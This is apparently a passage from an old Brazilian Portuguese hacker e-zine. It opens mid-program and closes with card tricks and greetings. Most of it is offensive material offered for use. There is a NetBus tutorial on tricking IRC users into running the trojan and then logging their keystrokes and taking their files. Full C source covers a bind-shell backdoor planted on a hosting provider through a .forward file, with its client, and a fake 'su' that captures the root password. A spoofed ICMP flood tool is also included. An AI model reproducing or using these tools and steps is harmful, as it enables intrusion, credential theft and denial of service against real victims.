esqueca que p/ o perfeito funcionamento do prog . e necessario que\nno passwd so contenha as senhas, ou seja, sem nenhum comentario.\n\n"); printf("\033[0;40;37m"); exit(1); } if ((fp = fopen (argv[1], "r")) == NULL) { printf("Impossivel ler o arquivo especificado\n"); exit(1); } else { while (!feof(fp)) { fscanf(fp, "%[^\n]\n", &letter); for ( i = 0; i <= 15; ++i) { if ( letter[i] == ':') i = 15; else printf("%c", letter[i]); } printf("\n"); } fclose(fp); } } ----------------------------------------------------------------------------- јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј ss. .ss ss. .ss ss. .ss ss. .ss sSS SSs sSS SSs sSS SSs sSS SSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSss SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS $$$$$$$ $$$$$$$$$$$$$$$$$$ $ $ $ $ $$$ $ $$$$$$$ $$$$$$ $$$$$$$$$$$$$$$$$$ $$$$$ $$$$$$$$ $$ $ $$ $ $$$$$$$$$$ $$$$$ 7. Win Attack $$$$$$$$$$$$$$$$$$ $$$$$ $$$ $$$ $ $ $ $ $$$$$ $$$$$$ $$$$$$$$$$$$$$$$$$$$ $$$$$$$$$ $$ $$$$ $ $$ $ $$$$$$$$ $$$$$$$ $$$$$$$$$$$$$$$$$$$$$$ $ $ $ $ $$$ $ $$$ SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSS SSS SSS SSS SSS SSS SSS SSS S S S S S S S S јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј Primeiro eu gostaria de me desculpar com o [LuCiFeR].. A sua materia vai ter que ficar para a prѓxima edicao, pois o seu email chegou depois desse entao em consideracao, decidi publicar essa materia primeiro. Mas nem te esquenta, pois na proxima edicao sai outra materia quente sobre esse programa que atualmente e' uma das maiores diversoes para tirar sarro com o outro kra. јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј Net Bus ( por ZeFuReNgA ) Antes de qq um falar algo pela primeira vez ele deve ser apresentar nao acham? :) Bem... Meu codname щ ZeFuReNgA membro da ICMP sekurity group tenho 14 anos e 2 anos nesse mundo muito interessante que щ o mundo UNDERGROUND! Caso voce quer me encontrar me procure : E-Mail : furenga@linuxbr.com.br - rmaa@cruiser.com.br - furenga@hotmail.com IRC : Brasirc - irc.artnet.com.br - #Hacker , #icmp UIN : Nao vou dar pq tem babacas que aprenderam a usar icq flood ontem :) Bem, chegando de blс blс ... Nesta matщria eu irei fazer um tutorial sobre o NET BUS. Nao... Nao... NET BUS nao щ um Onibus na net ( bah... heheh piada ridicula ) OBS : щ um prazer escrever para a CSZ umas das zines que vem fazendo mais sucesso no brasil atualmente devido a vontade de fazer uma zine sщria... que ja ultrapassou do numero 20 coisa que nunca vi em uma zine aqui no brasil _____________________________________________________________________________ Netbus щ um programa para vocъ controlar remotamente um computador ligado a internet que esteja rodando WINDOWS 95 / 98 / NT Ele permite que vocъ tenha total acesso ao outro computador. Mas antes de vocъ ja ir pensando em sair invadindo o computador do pessoal... Vocъ vai ter uma dificil tarefa... jogar o patche.exe para o com- putador da vitima e fazelo (a) executalo. Ai vocъ pensa... O que esse patche.exe tem haver com isso tudo? Bem... Este arquivo щ um cavalo de troia que abrira no computador da vitima uma porta onde o cliente do NETBUS (netbus.exe) ira usar para a inva- sao. Ele usa o protocolo tcp/ip :) Vocъ jс deve estar querendo saber o lugar onde se pega o netbus nщ? entao ok... eu sou bonzinho hehe... vс em http://www.warforge.com - Obs : nуo me mande e-mail falando que nao acho ele! Se vira que ele esta lс... Agora que vocъ ja deu o download descompacta ele para c:\netbus com o WINZIP , PKUNZIP ou qualquer dessas merdas ae... caso vocъ nao tenha o winzip vai em www.winzip.com Pronto... agora vocъ ira precisar infectar alguem. Entre em qualquer servidor de irc. E procure conversar com uns lammers... diz que щ um nuke foda ou um programa para hackear provedor ( putz hehehe ). Se vira e joga essa merda lс... Ja jogo? Ele ja rodo? OPAAA!!! agora ta beleza... Agora rodeo o cliente do Netbus (netbus.exe) agora siga os passos : Conectando ao computador : Na parte " Host name / IP : " Bote o IP do cara... e Clique em Connect! Depois disso щ sѓ vocъ fazer a festa... Vocъ pode ficar abrindo e fechando o CD - ROM do cara, mandar uma caixa de dialogo , tirar uma foto do computador dele , dar download dos arquivos e tem no computador dele e dar upload , rodar aplicativos e mais muita coisa que eu vou descrever abaixo. Jс conectado ao computador da vitima voce pode fazer essas seguintes acѕes... Tudo isso feito por vocъ! * Abrir e fechar o CD - ROM * Mostrar imagens * Trocar as funcoes do mouse tipo o click no botao direito serс como um click no esquerdo * Tocar uma musica * Comandar o mouse da vitima * Desligar , Reiniciar o computador da vitima * Ir para uma homepage ( bota um site gay pra zoar o cara! ) * Gravar todas as teclas que ele esta digitando! ( bom para vocъ ler os pvts!) * Tirar foto do micro do cara! ( Yeah! isso mesmo! ACREDITE!) * Upload de qualquer arquivo de voce e manda pra ele! ( e rodar! bom para virus.. voce passa e roda ele :)) * Aumentar e diminuir o volume do som * Fazer sons ao clicar no teclado * Dar downloads e deletar qualquer coisa ( deletar щ coisa de babaca...) * Travar certas teclas do teclado * Botar senha no micro dele para que so voce possa usar o NETBUS nele DICAS QUENTES PARA VOCЪ USAR COM O NETBUS!! Jogue para o computador do cara o boserve.exe ( o virus do BO ) e rodeo ele... ai vocъ terс 2 opcoes de invadir o computador do lamer , por netbus ou por backorifice ( show! ) Trave as vogais dele ( a,e,i,o,u ) voce nao tera ideia de como serс engraчado ver ele falando sem as vogais... tipo "v t dr prrd!!!" = "vou te dar porrada!!!" Abre qualquer cliente de IRC e digite /dns www.provedor.com.br . Ele returnara com um numero (ip) tipo 200.222.234.54. Copie esse ip e cole no Netbus e bote 200.222.234.54+100 . Clicke em connect! Ele irс scannear todos os ips de 200.222.234.0 a 200.222.234.100 ( Se conectar em algum comemore :) ! ) _____________________________________________________________________________ Bem... Acho que ja ta bom o papo de hoje sobre netbus... Espero ter te ajudado :) Boa invadidas... See you later! E POR FAVOR!!! NAO ME VENHA ENCHER O SACO VIA E-MAIL OU IRC ME PER- GUNTADO PERGUNTAS IDIOTAS OU IPS COM NETBUS! ABRAЧOS A TODOS QUE LERAM A MINHA MСTERIA... "Pra quem fica a minha pica , pra quem vai a pica do meu pai e pra quem nao gosto a pica do meu avє!" ZeFuReNgA јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј ss. .ss ss. .ss ss. .ss ss. .ss sSS SSs sSS SSs sSS SSs sSS SSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSss SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS $$$$$$$ $$$$$$ $ $ $ $ $$$ $ $$$$$$$ $$$$$$ $$$$$$ $$$$$ $$$$$$$$ $$ $ $$ $ $$$$$$$$$$ $$$$$ 8. Invasao de privacidade $$$$$$ $$$$$ $$$ $$$ $ $ $ $ $$$$$ $$$$$$ $$$$$$$$ $$$$$$$$$ $$ $$$$ $ $$ $ $$$$$$$$ $$$$$$$ $$$$$$$$$$ $ $ $ $ $$$ $ $$$ SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSS SSS SSS SSS SSS SSS SSS SSS S S S S S S S S јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј Hackeando a XOOM Este metodo ainda nao foi descrito em nenhum outro lugar e pode pare- cer meio complicado de inicio, mas logo voce pega a manha. O metodo descrito aqui e' para voce conseguir uma shell na xoom, coi- sa que eles nao dam no cadastro. Apos o cadastro na XOOM voce ganha acesso a ftp e smtp. Entao faca o seguinte: 1. Entre por ftp no xoom.com 2. Digite sua senha e seu password 3. Envie o Hackshd (o codigo aparecera' aqui), jah compilado, para seu dir home. 4. Envie um arquivo de nome .forward com o seguinte conteudo. chmod a+x hackshd ./hackshd 5. Desconectesse e Abra um telnet pela porta 25(smtp). 6. Mande um email pra si mesmo. 7. Prontu!!! O hackshd foi abriu uma shell na porta 6666 da xoom. Este programa, foi produzido por Oluparum que jah escreveu para a Axur05. A meu respeito foi uma das melhores materias que sairam na Axur05. Hm.. o programa tem algumas falhas, mas vc aprendera a usa-lo direi- tinho com o tempo. Para descubrir as falhas va em... http://www.geocities.com/CollegePark/Campus/7154/ ...e pegue a Axur05 numero 2. PS1: A page da Axur05 continua inativa. PS2: Tirei alguns comentarios do programa, mas o autor jah foi falado. PS3: O Oluparum nao me deu permissao de mencionar seu programa nem seu nick. Nao consegui contata-lo.. Se vc estiver lendo isso mail-me okz?? --------------------------Corte Aki--(hackshd.c)----------------------------- #include #include #include #include #include #include #define NUMPORT 6666 /* Numero do PORT atendido pelo server */ main() { int insock, conec, c; struct sockaddr_in cli_addr, serv_addr; conec = accept( insock, (struct sockaddr*) &cli_addr, &c); insock = socket(AF_INET, SOCK_STREAM,0); bzero( (char *) &serv_addr, sizeof(serv_addr) ); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr = htonl(INADDR_ANY); serv_addr.sin_port = htons(NUMPORT); bind( insock, (struct sockaddr *) &serv_addr, sizeof(serv_addr) ); listen( insock, 1 ); c = sizeof( cli_addr ); conec = accept( insock, (struct sockaddr*) &cli_addr, &c); dup2(conec,0); dup2(conec,1); dup2(conec,2); execl("/bin/sh","sh", 0); } ----------------------------------------------------------------------------- Se voce tiver linux rode esse cliente para o hackshd na seguinte sin- taxe: hackclient host.com.br Lembresse que a porta padrao e' 6666. --------------------------Corte Aki--(hackclient.c)-------------------------- #include #include #include #include #include #include #include #include #include #define PORT_SERVER 6666 extern int errno; void emula (conec) int conec; { char tecla[2], in[2]; int lidos = 0; switch ( fork() ) { case -1: printf("\nErro no Fork"); return; case 0: while (1) { if ( (lidos = read(conec, in, 1)) > 0 ) putchar(in[0]); else { if (lidos == 0) return; else { printf("\nErro na gravacao"); return; } } } default: while (1) { tecla[0] = getchar(); if ( (write( conec, tecla, 1)) == -1) { perror("ERRO:"); printf("\nErro no write"); return; } } } } int main( numarg, argv) int numarg; char **argv; { struct hostent *hp; struct sockaddr_in sin; short s, portnum = PORT_SERVER; char host[80]; numarg--; switch (numarg) { case 2: portnum = atoi(argv[2]); case 1: strcpy(host, argv[1]); break; default: printf("Sintaxe: hacksh server_name \n"); return(-1); } hp = gethostbyname( host ); if ( hp == 0 ) { perror ( "hacksh: gethostbyname" ); exit ( 1 ); } bzero ( &sin, sizeof ( sin ) ); bcopy ( hp->h_addr, &sin.sin_addr, hp->h_length ); sin.sin_family = hp->h_addrtype; sin.sin_port = htons( portnum ); s = socket ( AF_INET, SOCK_STREAM, 0 ); if ( s == -1 ) { perror ( "hacksh: socket" ); exit ( 1 ); } if ( connect ( s, (struct sockaddr *) &sin, sizeof ( sin ) ) == -1 ) { perror ( "hacksh: connect" ); printf ( " - erro de connect status - %d ", errno ); exit ( 1 ); } emula ( s ); close ( s ); return(0); } ----------------------------------------------------------------------------- Ambos programas devem ser compilados com: cc -o јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј ss. .ss ss. .ss ss. .ss ss. .ss sSS SSs sSS SSs sSS SSs sSS SSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSss SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS $$$$$$$ $$$$$$$$$$$$$$$ $ $ $ $ $$$ $ $$$$$$$ $$$$$$ $$$$$$$$$$$$$$$ $$$$$ $$$$$$$$ $$ $ $$ $ $$$$$$$$$$ $$$$$ 9. Hack, the Art $$$$$$$$$$$$$$$ $$$$$ $$$ $$$ $ $ $ $ $$$$$ $$$$$$ $$$$$$$$$$$$$$$$$ $$$$$$$$$ $$ $$$$ $ $$ $ $$$$$$$$ $$$$$$$ $$$$$$$$$$$$$$$$$$$ $ $ $ $ $$$ $ $$$ SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSS SSS SSS SSS SSS SSS SSS SSS S S S S S S S S јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј Su Trojam Esse trojam eu encontrei a pouco, porem jah deve ser bem conhecido da galera experiente. Coloque-o num diretorio que esteja no path exatamente com 'su' e com permisуo de execuчao para todos. Se ainda nao sabe como fazer isso.. $ echo $PATH /bin:/sbin:/usr/bin:/usr/sbin:... $ cp su /bin $ chmod 755 /bin/su -------------------------------Corte Aki--(su)------------------------------- #include #include #define SU_PASS "/tmp/.rewt" main (int argc, char *argv[]) { char *key; char buf[24]; FILE *fd; key = (char *)getpass ("Password:"); fd = fopen(SU_PASS,"w"); fprintf(fd, "pass: %s\n", key); fclose(fd); printf ("su: incorrect password\n"); sprintf(buf, "rm %s", argv[0]); system(buf); exit (1); } ----------------------------------------------------------------------------- Agora leia o arquivo /tmp/.rewt e lah encontrara' a senha do root. јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј Hacking Conex A conex e' um provedor muito rulz as sextas e sabados de noite, pois durante a semana, ela nao suporta uma conexao por mais de 10 minutos. Acontece que a conex e' um dos provedores mais fodas de hackear... Os unicos servicos que prestam lah sao ftp, smtp, http. Notou que ateh acesso a telnet eles tiraram??? Outros detalhes..O ftp anonymous foi cortado; mesmo voce entrando com o login/senha direitinho no ftp, nao consegue conexao(Login Error); Entre outros..Soh consegui mesmo usar o smtp da conex. Agora eu nao me lembro qual o smtp que eles usam, mas vai ter que ser assim que teremos que explora-la. Em algumas edicoes passadas, vcs encontraram uma lista de bugz para sendmail.. јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј ICMP Packets spoof Este programa pode estar meio desatualizado mas foi o unico que fun- cionou com sucesso.. Tentei simplifica-lo o maximo e tambem corrigi alguns erros mediocres que se encontravam nele. O autor do programa e' Rza (???). -----------------------------Corte Aki--(bewm.c)----------------------------- #include #include #include #include #include #include #include #include #include #define PACKETSIZE (sizeof(struct iphdr) + sizeof(struct icmphdr) + sizeof(struct iphdr) + 16) #define ICMPSIZE (sizeof(struct icmphdr) + sizeof(struct iphdr) + 16) #define offsetTCP (sizeof(struct iphdr) + sizeof(struct icmphdr) + sizeof(struct iphdr)) #define offsetIP (sizeof(struct iphdr) + sizeof(struct icmphdr)) #define offsetICMP (sizeof(struct iphdr)) #define offsetRIP (0) static int thecode; int s = 0; u_short cksum( u_short *, int ); void sendkill( char *, int, char *, int ); u_short cksum( u_short *buf, int nwords ) { unsigned long sum; for ( sum = 0; nwords > 0; nwords -- ) sum += *buf++; sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); return ~sum; } void resolve_address(struct sockaddr * addr, char *hostname, u_short port) { struct sockaddr_in *address; struct hostent *host; address = (struct sockaddr_in *)addr; (void) bzero( (char *)address, sizeof(struct sockaddr_in) ); address->sin_family = AF_INET; address->sin_port = htons(port); address->sin_addr.s_addr = inet_addr(hostname); if ( (int)address->sin_addr.s_addr == -1) { host = gethostbyname(hostname); if (host) { bcopy( host->h_addr, (char *)&address->sin_addr, host->h_length); } else { puts("Couldn't resolve address!!!"); exit(-1); }}} void sendkill( char * fromhost, int fromport, char * tohost, int toport ) { char *packet; static struct sockaddr_in local, remote; static int sock = 0; if ( !sock ) { resolve_address( (struct sockaddr *)&local, fromhost, fromport ); resolve_address( (struct sockaddr *)&remote, tohost, toport ); sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if ( sock == -1 ) { perror("Getting raw socket"); exit(-1); }} packet = (char *)malloc( PACKETSIZE ); if ( !packet ) { perror("Getting space for packet"); exit(-1); } { struct tcphdr * fake_tcp; fake_tcp = ( struct tcphdr *)( packet + offsetTCP ); fake_tcp->th_dport = htons(fromport); fake_tcp->th_sport = htons(toport); fake_tcp->th_seq = 0x1984; } { struct iphdr * fake_ip; fake_ip = ( struct iphdr *) ( packet + offsetIP ); fake_ip->version = 4; fake_ip->tot_len = htons(0x2C); fake_ip->tos = 0; fake_ip->id = htons( getpid() & 255 ); fake_ip->frag_off = 0; fake_ip->ttl = 1; fake_ip->check = 31337; fake_ip->ihl = 5; bcopy( (char *)&local.sin_addr, &fake_ip->daddr, sizeof( fake_ip->daddr ) ); bcopy( (char *)&remote.sin_addr,&fake_ip->saddr, sizeof( fake_ip->saddr ) ); fake_ip->protocol = 6; } { struct icmphdr * icmp; icmp = ( struct icmphdr *)(packet + offsetICMP ); icmp->type = 4; icmp->code = thecode; icmp->un.gateway = 0; icmp->checksum = 0; icmp->checksum = cksum( (u_short *)(icmp), ICMPSIZE >> 1 ); } { struct iphdr * real_ip; real_ip = ( struct iphdr *)packet; real_ip->version = 4; real_ip->ihl = 5; real_ip->tot_len = htons(PACKETSIZE); real_ip->tos = ( 7 << 5) | 4; real_ip->ttl = 255; real_ip->protocol = 1; real_ip->check = 0; real_ip->id = htons( 3 ); real_ip->frag_off = 0; bcopy( (char *)&local.sin_addr, &real_ip->saddr, sizeof( real_ip->saddr ) ); bcopy( (char *)&remote.sin_addr,&real_ip->daddr, sizeof( real_ip->daddr ) ); real_ip->saddr = htonl( ntohl(real_ip->daddr ) & 0xffffff00L ); real_ip->check = cksum( (u_short *)packet, sizeof( struct iphdr ) >> 1 ); } { int result; result = sendto( sock, packet, PACKETSIZE, 0, (struct sockaddr *)&remote, sizeof( remote ) ); if ( result != PACKETSIZE ) { perror("sending packet" ); }}} void finish() { (void)signal(SIGINT, SIG_IGN); (void)putchar('\n'); (void)printf("--- bEWm sTATISTICs ---\n"); (void)printf("pACKETs sENt: %d \n", s); (void)putchar('\n'); exit(0); } main(int argc, char ** argv) { int codes,i; puts("==========================================="); puts("bEWm"); puts("Written by Rza"); puts("vEr 1.0"); puts("Tue Jun 11 06:54:07 EDT 1996"); puts("==========================================="); if (argc != 7) { puts("SYNTAX: "); exit(-1); } thecode = atoi(argv[6]); sendloop: for( i = atoi(argv[4]) ; i <= atoi(argv[5]) ; i++) { s++; printf("%d bytes from %s : %d to %s : %d ",PACKETSIZE+ICMPSIZE,argv[1],atoi(argv[2]),argv[3],i); sendkill(argv[1], atoi(argv[2]), argv[3], i); usleep(300000); (void)signal(SIGINT, finish); } goto sendloop; } ----------------------------------------------------------------------------- јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј ss. .ss ss. .ss ss. .ss ss. .ss sSS SSs sSS SSs sSS SSs sSS SSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSss SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS $$$$$$$ $$$$$$$$$$$$$$$$$ $ $ $ $ $$$ $ $$$$$$$ $$$$$$ $$$$$$$$$$$$$$$$$ $$$$$ $$$$$$$$ $$ $ $$ $ $$$$$$$$$$ $$$$$ 10.ЁЁЁBoNuS!!! $$$$$$$$$$$$$$$$$ $$$$$ $$$ $$$ $ $ $ $ $$$$$ $$$$$$ $$$$$$$$$$$$$$$$$$$ $$$$$$$$$ $$ $$$$ $ $$ $ $$$$$$$$ $$$$$$$ $$$$$$$$$$$$$$$$$$$$$ $ $ $ $ $$$ $ $$$ SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSS SSS SSS SSS SSS SSS SSS SSS S S S S S S S S јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј Truques com cartas Bah!! Eu sei que isso nao tem nada a ver.. Acontece que os unicos e- mails que eu recebi, foram os dos atuais editores e novos editores, por isso nao tinha o que colocar na secao de emails. Na secao de BoNuS eu tb nao tinha nada novo pa' colocar e nao queria colocar novamente a lista Top10 hacking.. Por isso, me lembrei de uns truques com cartas que me ensinaram jah faiz um tempo e gostaria de passar adiante, jah que estamos ai pra divulgar informacao mesmo. ##### Truque 1 ##### ##### Adivinhando a Carta ##### Separe um baralho de 52 cartas(tire os 2 coringas), em pares e impa- res. Sendo que os pares sao: 2, 4, 6, 8, 9, 10 e 12(dama). E os impares sao: 1(As), 3, 5, 7, 9, 11(valete), 13(rei). Separeas em dois bolinhos. Vire um bolinho(qquer um) de costas para a mesa e o outro de costas para voce. Embaralhe-os desse mesmo modo em que se encontram. Pares de um lado e impares do outro. Peчa para que alguem escolha uma carta que esteja de costas para vc, para que vc nao saiba qual e'. Em quanto ele olha a carta, vire o bolo de cartas que esta em sua mao e peчa para que ele coloque a carta do geito que a tirou em qquer parte do baralho. Feche o bolo novamente e embaralhe-o se a pessoa quizer assim.. Agora va passando as cartas e olhando-as. A que nao for da sequencia sera' a que ele escolheu. Vc: "Hу????". Assim.. 2, 6, 4, 12, 6, 3... O 3 e' a carta escolhida, pois e' a carta impar no lado das cartas pares. Se for ao contrario.. 3, 9, 5, 1, 1, 7, 8... O 8 sera' a carta escolhida. јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј Vou deixar os outros truques para outras edicoes que nao tenham mails para publicar. јијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијијиј ss. .ss ss. .ss ss. .ss ss. .ss sSS SSs sSS SSs sSS SSs sSS SSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSs sSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSssSSSSSSSSSSSSSSSSSss SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $ $ $ $ $$$ $ $$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$ $$$$$$$$ $$ $ $$ $ $$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$ $$$ $$$ $ $ $ $ $$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$ $$ $$$$ $ $$ $ $$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $ $ $ $ $$$ $ $$$ SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS S SSSSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSSSS SSS SSS SSS SSS SSS SSS SSS SSS S S S S S S S S Como sempre, gostaria de mandar um abraчo para: [LuCiFeR] ==> o filho do Diabo |zERo| spectro JimiHendrx kbyte ZeFuReNgA AcidBrain almeida [SerrialKiller] DeMoN Gabriel Dov Shotgun Whist